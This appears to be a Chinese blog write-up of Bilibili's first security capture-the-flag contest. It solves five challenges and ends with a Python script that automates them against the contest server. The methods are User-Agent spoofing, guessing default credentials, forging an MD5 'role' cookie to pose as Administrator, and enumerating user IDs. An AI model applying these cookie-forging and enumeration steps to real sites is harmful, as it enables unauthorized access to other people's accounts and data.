10月24日是程序员节，很多网站也推出了相关活动庆祝这个程序员的节日。B站也借这个时间推出了B站的首届安全挑战赛，正好我之前玩过Jetbrains那个谜题解答，对这类解密活动很感兴趣，所以就研究了一下，也参考了不少朋友的思路。最后让我为大家分享一下前5道比较简单题目的解答，后面的题目难度较高，目前还没有确定的思路，所以就不管它了。

再来谈谈这个安全挑战赛本身，其实也是由来已久。和ACM等比赛类似，安全挑战赛通过一些题目来考察参赛者的信息安全技术，要根据题目去寻找漏洞，发现隐藏在题目背后的标志，这个过程称作capture the flag。下面题目中涉及的ctf，正是这个过程的简称。

B站的这次活动网址如下，如果有兴趣的话，可以先自己尝试一下，实在做不出来了，在参考网络上的答案。

http://45.113.201.36/start.html

第一题：页面的背后是什么

打开题目所指的网页，会看到这么一个页面。

第一题页面

看起来什么也没有，根据题目的提示，按F12开发者工具查看网页源代码，可以看到flag1也就是问题1的答案，就隐藏在页面代码之中。

网页源代码

第二题：真正的秘密只有特殊的设备才能看到

第二题的网页仍然是这个页面，但是这次要寻找的就是flag2。这里其实我胡思乱想了很多，其实思路很简单，按照页面中的提示用B站浏览器访问，但是实际上并没有这个所谓的浏览器应用。那么答案就很明显了，将浏览器的useragent修改成这个就好了嘛。

这也同样可以用F12开发者工具解决，先调出Console Drawer，然后点击其旁边的三个点也就是“更多工具”按钮，然后选择Network Conditions，在里面自定义浏览器UA，改成页面中提示的bilibili Security Browser即可。

修改浏览器UA

然后刷新网页，就可以看到flag2已经出现了。

刷新网页

第三题：密码是啥

这次的问题其实非常简单，如果运气好试几次密码就可以蒙出来，正确的用户名和密码是admin和bilibili，输入即可。这里我蒙了好几次，都恰好和答案擦肩而过。最后没想到答案这么简单，其实这道题理论上应该使用SQL注入等技术来做，不过目前没有什么思路，所以就先这样吧。

密码是什么

第四题：对不起，权限不足

好吧，这道题其实我应该很容易就做出来，但是之前研究Spring Security和Shiro的时候我嫌麻烦直接跳过了，所以并没有思路。Shiro这些权限验证框架可以非常轻松的让应用实现相关功能，一般会在HTTP请求头上做一些手脚，加一些自定义字段在服务器验证。

权限不足

这道题也是如此，在开发者工具中切换到网络选项卡，然后刷新一下网页，重新捕获一下请求过程，就可以在Cookie中发现端倪。这次发现多了一个role字段，后面应该是一串加密过的信息，于是我们尝试解密。

F12网络调试工具

现在网络上有很多在线的解密工具，这里我用的是cmd5这个网站，输入密文即可解密。如果你有经验的话，可以猜到这其实就是一个MD5加密字符串，自己尝试几次就可以发现这段密文代表的是user。

cmd5在线解密

根据网页的提示，现在要做的就是把管理员转换成md5密文，然后替换这里的role值即可。你可能尝试admin，superadmin等几个字符串，但是其实真正的答案是Administrator，这一点比较坑。MD5加密之后的结果是7b7bc2512ee1fedcd76bdc68926d4f7b，然后在F12开发者工具中替换cookie。然后刷新页面，就可以看到答案了。

修改role

第五题：别人的秘密

这次可以看到页面上没有任何信息，所以照例先用F12开发者工具探查一下。

别人的秘密

很快就可以发现页面里有这么一段JS代码，大概意思就是某个uid会返回正确的结果。其实说白了就是让你批量查询一下。

隐藏的JS代码

那么我们就编写Python代码来查询一下吧，代码大概长这个样子，这段代码用到了requests类库，需要自己先安装一下。运行完毕之后，就会查到正确的flag了。

start_uid = 100336889
for i in range(start_uid, start_uid+100):
    response = requests.get(
        'http://45.113.201.36/api/ctf/5', cookies=cookies, params={'uid': i})
    if response.json()['code'] == 200:
        pprint(response.json())
        break

相信很多朋友肯定懒得动手，又想玩一玩这个比赛。所以我把前五题的答案写成了Python代码，需要的可以自取。

# B站首届安全挑战赛

import requests
from pprint import pprint
import hashlib

# 从浏览器获取自己的B站session
bilibili_session = ''
cookies = {'session': bilibili_session,
           'role': hashlib.md5(b'Administrator').hexdigest()}


def flag1():
    response = requests.get('http://45.113.201.36/api/admin', cookies=cookies)
    pprint(response.json())


def flag2():
    response = requests.get('http://45.113.201.36/api/ctf/2', cookies=cookies,
                            headers={'User-Agent': 'bilibili Security Browser'})
    pprint(response.json())


def flag3():
    response = requests.post(
        'http://45.113.201.36/api/ctf/3', cookies=cookies,
        headers={'Content-Type': 'application/json'}, json={'username': 'admin', 'passwd': 'bilibili'})
    pprint(response.json())


def flag4():
    response = requests.get('http://45.113.201.36/api/ctf/4', cookies=cookies)
    pprint(response.json())


def flag5():
    start_uid = 100336889
    for i in range(start_uid, start_uid+100):
        response = requests.get(
            'http://45.113.201.36/api/ctf/5', cookies=cookies, params={'uid': i})
        if response.json()['code'] == 200:
            pprint(response.json())
            break


flag1()
flag2()
flag3()
flag4()
flag5()